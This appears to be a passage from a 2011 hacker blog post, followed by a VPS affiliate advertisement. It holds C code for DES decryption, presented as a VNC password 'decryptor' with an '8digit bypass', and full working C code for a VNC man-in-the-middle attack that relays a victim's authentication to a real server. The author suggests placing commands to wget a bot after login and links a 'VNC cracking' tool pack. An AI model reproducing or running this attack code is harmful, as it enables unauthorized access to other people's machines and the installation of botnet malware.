	*into++ = (*outof >> 24) & 0xffL;
	*into++ = (*outof >> 16) & 0xffL;
	*into++ = (*outof >>  8) & 0xffL;
	*into	=  *outof	 & 0xffL;
	return;
	}

static unsigned long SP1[64] = {
	0x01010400L, 0x00000000L, 0x00010000L, 0x01010404L,
	0x01010004L, 0x00010404L, 0x00000004L, 0x00010000L,
	0x00000400L, 0x01010400L, 0x01010404L, 0x00000400L,
	0x01000404L, 0x01010004L, 0x01000000L, 0x00000004L,
	0x00000404L, 0x01000400L, 0x01000400L, 0x00010400L,
	0x00010400L, 0x01010000L, 0x01010000L, 0x01000404L,
	0x00010004L, 0x01000004L, 0x01000004L, 0x00010004L,
	0x00000000L, 0x00000404L, 0x00010404L, 0x01000000L,
	0x00010000L, 0x01010404L, 0x00000004L, 0x01010000L,
	0x01010400L, 0x01000000L, 0x01000000L, 0x00000400L,
	0x01010004L, 0x00010000L, 0x00010400L, 0x01000004L,
	0x00000400L, 0x00000004L, 0x01000404L, 0x00010404L,
	0x01010404L, 0x00010004L, 0x01010000L, 0x01000404L,
	0x01000004L, 0x00000404L, 0x00010404L, 0x01010400L,
	0x00000404L, 0x01000400L, 0x01000400L, 0x00000000L,
	0x00010004L, 0x00010400L, 0x00000000L, 0x01010004L };

static unsigned long SP2[64] = {
	0x80108020L, 0x80008000L, 0x00008000L, 0x00108020L,
	0x00100000L, 0x00000020L, 0x80100020L, 0x80008020L,
	0x80000020L, 0x80108020L, 0x80108000L, 0x80000000L,
	0x80008000L, 0x00100000L, 0x00000020L, 0x80100020L,
	0x00108000L, 0x00100020L, 0x80008020L, 0x00000000L,
	0x80000000L, 0x00008000L, 0x00108020L, 0x80100000L,
	0x00100020L, 0x80000020L, 0x00000000L, 0x00108000L,
	0x00008020L, 0x80108000L, 0x80100000L, 0x00008020L,
	0x00000000L, 0x00108020L, 0x80100020L, 0x00100000L,
	0x80008020L, 0x80100000L, 0x80108000L, 0x00008000L,
	0x80100000L, 0x80008000L, 0x00000020L, 0x80108020L,
	0x00108020L, 0x00000020L, 0x00008000L, 0x80000000L,
	0x00008020L, 0x80108000L, 0x00100000L, 0x80000020L,
	0x00100020L, 0x80008020L, 0x80000020L, 0x00100020L,
	0x00108000L, 0x00000000L, 0x80008000L, 0x00008020L,
	0x80000000L, 0x80100020L, 0x80108020L, 0x00108000L };

static unsigned long SP3[64] = {
	0x00000208L, 0x08020200L, 0x00000000L, 0x08020008L,
	0x08000200L, 0x00000000L, 0x00020208L, 0x08000200L,
	0x00020008L, 0x08000008L, 0x08000008L, 0x00020000L,
	0x08020208L, 0x00020008L, 0x08020000L, 0x00000208L,
	0x08000000L, 0x00000008L, 0x08020200L, 0x00000200L,
	0x00020200L, 0x08020000L, 0x08020008L, 0x00020208L,
	0x08000208L, 0x00020200L, 0x00020000L, 0x08000208L,
	0x00000008L, 0x08020208L, 0x00000200L, 0x08000000L,
	0x08020200L, 0x08000000L, 0x00020008L, 0x00000208L,
	0x00020000L, 0x08020200L, 0x08000200L, 0x00000000L,
	0x00000200L, 0x00020008L, 0x08020208L, 0x08000200L,
	0x08000008L, 0x00000200L, 0x00000000L, 0x08020008L,
	0x08000208L, 0x00020000L, 0x08000000L, 0x08020208L,
	0x00000008L, 0x00020208L, 0x00020200L, 0x08000008L,
	0x08020000L, 0x08000208L, 0x00000208L, 0x08020000L,
	0x00020208L, 0x00000008L, 0x08020008L, 0x00020200L };

static unsigned long SP4[64] = {
	0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
	0x00802080L, 0x00800081L, 0x00800001L, 0x00002001L,
	0x00000000L, 0x00802000L, 0x00802000L, 0x00802081L,
	0x00000081L, 0x00000000L, 0x00800080L, 0x00800001L,
	0x00000001L, 0x00002000L, 0x00800000L, 0x00802001L,
	0x00000080L, 0x00800000L, 0x00002001L, 0x00002080L,
	0x00800081L, 0x00000001L, 0x00002080L, 0x00800080L,
	0x00002000L, 0x00802080L, 0x00802081L, 0x00000081L,
	0x00800080L, 0x00800001L, 0x00802000L, 0x00802081L,
	0x00000081L, 0x00000000L, 0x00000000L, 0x00802000L,
	0x00002080L, 0x00800080L, 0x00800081L, 0x00000001L,
	0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
	0x00802081L, 0x00000081L, 0x00000001L, 0x00002000L,
	0x00800001L, 0x00002001L, 0x00802080L, 0x00800081L,
	0x00002001L, 0x00002080L, 0x00800000L, 0x00802001L,
	0x00000080L, 0x00800000L, 0x00002000L, 0x00802080L };

static unsigned long SP5[64] = {
	0x00000100L, 0x02080100L, 0x02080000L, 0x42000100L,
	0x00080000L, 0x00000100L, 0x40000000L, 0x02080000L,
	0x40080100L, 0x00080000L, 0x02000100L, 0x40080100L,
	0x42000100L, 0x42080000L, 0x00080100L, 0x40000000L,
	0x02000000L, 0x40080000L, 0x40080000L, 0x00000000L,
	0x40000100L, 0x42080100L, 0x42080100L, 0x02000100L,
	0x42080000L, 0x40000100L, 0x00000000L, 0x42000000L,
	0x02080100L, 0x02000000L, 0x42000000L, 0x00080100L,
	0x00080000L, 0x42000100L, 0x00000100L, 0x02000000L,
	0x40000000L, 0x02080000L, 0x42000100L, 0x40080100L,
	0x02000100L, 0x40000000L, 0x42080000L, 0x02080100L,
	0x40080100L, 0x00000100L, 0x02000000L, 0x42080000L,
	0x42080100L, 0x00080100L, 0x42000000L, 0x42080100L,
	0x02080000L, 0x00000000L, 0x40080000L, 0x42000000L,
	0x00080100L, 0x02000100L, 0x40000100L, 0x00080000L,
	0x00000000L, 0x40080000L, 0x02080100L, 0x40000100L };

static unsigned long SP6[64] = {
	0x20000010L, 0x20400000L, 0x00004000L, 0x20404010L,
	0x20400000L, 0x00000010L, 0x20404010L, 0x00400000L,
	0x20004000L, 0x00404010L, 0x00400000L, 0x20000010L,
	0x00400010L, 0x20004000L, 0x20000000L, 0x00004010L,
	0x00000000L, 0x00400010L, 0x20004010L, 0x00004000L,
	0x00404000L, 0x20004010L, 0x00000010L, 0x20400010L,
	0x20400010L, 0x00000000L, 0x00404010L, 0x20404000L,
	0x00004010L, 0x00404000L, 0x20404000L, 0x20000000L,
	0x20004000L, 0x00000010L, 0x20400010L, 0x00404000L,
	0x20404010L, 0x00400000L, 0x00004010L, 0x20000010L,
	0x00400000L, 0x20004000L, 0x20000000L, 0x00004010L,
	0x20000010L, 0x20404010L, 0x00404000L, 0x20400000L,
	0x00404010L, 0x20404000L, 0x00000000L, 0x20400010L,
	0x00000010L, 0x00004000L, 0x20400000L, 0x00404010L,
	0x00004000L, 0x00400010L, 0x20004010L, 0x00000000L,
	0x20404000L, 0x20000000L, 0x00400010L, 0x20004010L };

static unsigned long SP7[64] = {
	0x00200000L, 0x04200002L, 0x04000802L, 0x00000000L,
	0x00000800L, 0x04000802L, 0x00200802L, 0x04200800L,
	0x04200802L, 0x00200000L, 0x00000000L, 0x04000002L,
	0x00000002L, 0x04000000L, 0x04200002L, 0x00000802L,
	0x04000800L, 0x00200802L, 0x00200002L, 0x04000800L,
	0x04000002L, 0x04200000L, 0x04200800L, 0x00200002L,
	0x04200000L, 0x00000800L, 0x00000802L, 0x04200802L,
	0x00200800L, 0x00000002L, 0x04000000L, 0x00200800L,
	0x04000000L, 0x00200800L, 0x00200000L, 0x04000802L,
	0x04000802L, 0x04200002L, 0x04200002L, 0x00000002L,
	0x00200002L, 0x04000000L, 0x04000800L, 0x00200000L,
	0x04200800L, 0x00000802L, 0x00200802L, 0x04200800L,
	0x00000802L, 0x04000002L, 0x04200802L, 0x04200000L,
	0x00200800L, 0x00000000L, 0x00000002L, 0x04200802L,
	0x00000000L, 0x00200802L, 0x04200000L, 0x00000800L,
	0x04000002L, 0x04000800L, 0x00000800L, 0x00200002L };

static unsigned long SP8[64] = {
	0x10001040L, 0x00001000L, 0x00040000L, 0x10041040L,
	0x10000000L, 0x10001040L, 0x00000040L, 0x10000000L,
	0x00040040L, 0x10040000L, 0x10041040L, 0x00041000L,
	0x10041000L, 0x00041040L, 0x00001000L, 0x00000040L,
	0x10040000L, 0x10000040L, 0x10001000L, 0x00001040L,
	0x00041000L, 0x00040040L, 0x10040040L, 0x10041000L,
	0x00001040L, 0x00000000L, 0x00000000L, 0x10040040L,
	0x10000040L, 0x10001000L, 0x00041040L, 0x00040000L,
	0x00041040L, 0x00040000L, 0x10041000L, 0x00001000L,
	0x00000040L, 0x10040040L, 0x00001000L, 0x00041040L,
	0x10001000L, 0x00000040L, 0x10000040L, 0x10040000L,
	0x10040040L, 0x10000000L, 0x00040000L, 0x10001040L,
	0x00000000L, 0x10041040L, 0x00040040L, 0x10000040L,
	0x10040000L, 0x10001000L, 0x10001040L, 0x00000000L,
	0x10041040L, 0x00041000L, 0x00041000L, 0x00001040L,
	0x00001040L, 0x00040040L, 0x10000000L, 0x10041000L };

static void desfunc(block, keys)
register unsigned long *block, *keys;
{
	register unsigned long fval, work, right, leftt;
	register int round;
	leftt = block[0];
	right = block[1];
	work = ((leftt >> 4) ^ right) & 0x0f0f0f0fL;
	right ^= work;
	leftt ^= (work << 4);
	work = ((leftt >> 16) ^ right) & 0x0000ffffL;
	right ^= work;
	leftt ^= (work << 16);
	work = ((right >> 2) ^ leftt) & 0x33333333L;
	leftt ^= work;
	right ^= (work << 2);
	work = ((right >> 8) ^ leftt) & 0x00ff00ffL;
	leftt ^= work;
	right ^= (work << 8);
	right = ((right << 1) | ((right >> 31) & 1L)) & 0xffffffffL;
	work = (leftt ^ right) & 0xaaaaaaaaL;
	leftt ^= work;
	right ^= work;
	leftt = ((leftt << 1) | ((leftt>>31) & 1L)) & 0xffffffffL;
	for( round = 0; round < 8; round++ ) {
		work  = (right<<28) | (right>>4);
		work ^= *keys++;
		fval  = SP7[ work & 0x3fL];
		fval |= SP5[(work>>8) & 0x3fL];
		fval |= SP3[(work>>16) & 0x3fL];
		fval |= SP1[(work>>24) & 0x3fL];
		work  = right ^ *keys++;
		fval |= SP8[ work & 0x3fL];
		fval |= SP6[(work>>8) & 0x3fL];
		fval |= SP4[(work>>16) & 0x3fL];
		fval |= SP2[(work>>24) & 0x3fL];
		leftt ^= fval;
		work  = (leftt << 28) | (leftt>>4);
		work ^= *keys++;
		fval  = SP7[ work & 0x3fL];
		fval |= SP5[(work >>  8) & 0x3fL];
		fval |= SP3[(work >> 16) & 0x3fL];
		fval |= SP1[(work >> 24) & 0x3fL];
		work  = leftt ^ *keys++;
		fval |= SP8[ work & 0x3fL];
		fval |= SP6[(work >>  8) & 0x3fL];
		fval |= SP4[(work >> 16) & 0x3fL];
		fval |= SP2[(work >> 24) & 0x3fL];
		right ^= fval;
		}
	right = (right << 31) | (right >> 1);
	work = (leftt ^ right) & 0xaaaaaaaaL;
	leftt ^= work;
	right ^= work;
	leftt = (leftt << 31) | (leftt >> 1);
	work = ((leftt >> 8) ^ right) & 0x00ff00ffL;
	right ^= work;
	leftt ^= (work << 8);
	work = ((leftt >> 2) ^ right) & 0x33333333L;
	right ^= work;
	leftt ^= (work << 2);
	work = ((right >> 16) ^ leftt) & 0x0000ffffL;
	leftt ^= work;
	right ^= (work << 16);
	work = ((right >> 4) ^ leftt) & 0x0f0f0f0fL;
	leftt ^= work;
	right ^= (work << 4);
	*block++ = right;
	*block = leftt;
	return;
	}
[/code]

hehe thats basically, how a standard decryptor works, so, spot that 8digit bug yet ?? lol..... blieve me, use it!

now... one more code,and thats IT! THIS is a different method.. VNC MiTM attack! yea bitches... watchout!

1
#include <netinet/in.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

#define VNCPORT 5900
#define VNCSERVER "x.x.x.x"  // enter ya fakey here :P  this only is for, making it exec,
                             // look at bottom where it shows how todo this..
#define QUEUE 8
#define BUFSIZ 512

typedef char rfbProtocolVersionMsg[13];
#define sz_rfbProtocolVersionMsg 12

int main (int argc, char **argv) {
int sockfd, clientfd, vncfd;
int nbytes = 0;
struct sockaddr_in server, client, vnc;
int len = sizeof (client);
char buf [BUFSIZ];
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
perror ("socket");
exit (-1);
}
bzero (&server, sizeof (server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl (INADDR_ANY);
server.sin_port = htons (VNCPORT);
/* this is the fake VNC server */
if (bind (sockfd, (struct sockaddr *) &server, sizeof (server)) == -1) {
perror ("bind");
exit (-1);
}
listen (sockfd, QUEUE);
if ((clientfd = accept (sockfd,(struct sockaddr *) &client, &len)) == -1) {
perror ("accept");
exit (-1);
}
strcpy (buf, "RFB 003.003\n");
/* we must send VNC version number (from proto) */
if (write (clientfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we also must read VNC version number (from protocol) */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
buf [nbytes] = 0;
printf ("[VNC Version] -> %s\n", buf);
buf [0] = 0x00;
buf [1] = 0x00;
buf [2] = 0x00;
buf [3] = 0x02;
/* we send the authentication method code to the client */
if (write (clientfd, buf, 4) < 4) {
perror ("write");
exit (-1);
}
if ((vncfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
perror ("socket");
exit (-1);
}
bzero (&vnc, sizeof (vnc));
vnc.sin_family = AF_INET;
vnc.sin_addr.s_addr = inet_addr (VNCSERVER);
vnc.sin_port = htons (VNCPORT);
/* we connect to the real VNC server */
if (connect (vncfd, (struct sockaddr *) &vnc, sizeof (vnc) ) == -1) {
perror ("connect");
exit (-1);
}
/* again, we read version number from the VNC server */
if ((nbytes = read (vncfd, buf, BUFSIZ)) <= 0) {
perror ("read");
exit (-1);
}
strcpy (buf, "RFB 003.003\n");
/* and we send ours */
if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we now read auth method code from VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* here is the challenge from server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the challenge to the victim client */
if (write (clientfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we have the encrypted pass from the client */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the encrypted pass to the VNC server */
if (write (vncfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we read the result from the auth process */
if (read (vncfd, buf, BUFSIZ) < 4) {
perror ("read");
exit (-1);
}
/* at this point we should be authd */
/* place whatever code you want here ex: ftp cmd to wget your bot... */
close (clientfd);
close (sockfd);
close (vncfd);
return 0;
}

Nice one eh ... hehe, now imagine, making ppl logon, and show them a fake looking vnc but infact it is MiTM :P i have kept this one hidden until, i guess i got sick of being alone :P
Now..what else is handy for vnc ?

Try grab this, it might be more useful, but remember about the best exploit wich, has no cve...yet i just posted it :) the no.1 8digit bypass,is the best!
this pack, is only tools... not all mine, and, not MY viewer, but, i could add the viewer if i am requested personally, only on my irc channel #haxnet - EFnet!
xd!
-> http://hotfile.com/dl/136984708/855b1ef/VNC.Cracking-ALL.rar.html

ALSO look for VNCsnapshot,and also, the author of it or, a member of the team maybe, who actually made a MOD of it wich works exactly with MY bots listing :P so it is c00kl :)
Anyhow, this is , enough for now...

comments: 2 » tags:

VPS Hosting at 9.95 a/mo, VERY nice setups! Use AFF Link to get better deals/support!

Posted on 26th November 2011 in Android, Codes, Exploits, Papers, Uncategorized

SIGNUP HERE -> http://www.vr.org/aff.php?aff=551

Just to point out an awesome VPS hosting place, i currently have 2 boxes at, and who have the BEST customer support i have ever found!
The company is HostVirtual , a 11 location company, with datacenters opening now in Asia, wich is super-fast fiber lines.
Folks, this company is going places.. Also hosting warchall.net , and MANY other sites/shells!
They cater for all, have awesome service, and it is CLOUDS, you get what you pay for, they cannot cheat because xen-cloud, limits usage, accordingly…where openvz, does not. This is why, when your looking at your next Openvz box, check howmuch ram and burstable-ram you get..then check even… you will be shocked :>
This companys boxes are all Xeon QuadCore Highend side of town stuff, aweesome highspeed blades,all with extra fine DDoS protection!

Please use the AFFILIATE link http://www.vr.org/aff.php?aff=551 , and then you can use the hand of god to summon xd– on Efnet for support, or simply submit a ticket!

These boxes are worth it.. initial signup is only 4.31!
Existing customers, get 10% off each ‘instance’ wich is about 8bux for making another VPS… very handy :)

http://www.vr.org/aff.php?aff=551

comments: 3 » tags:
« Previous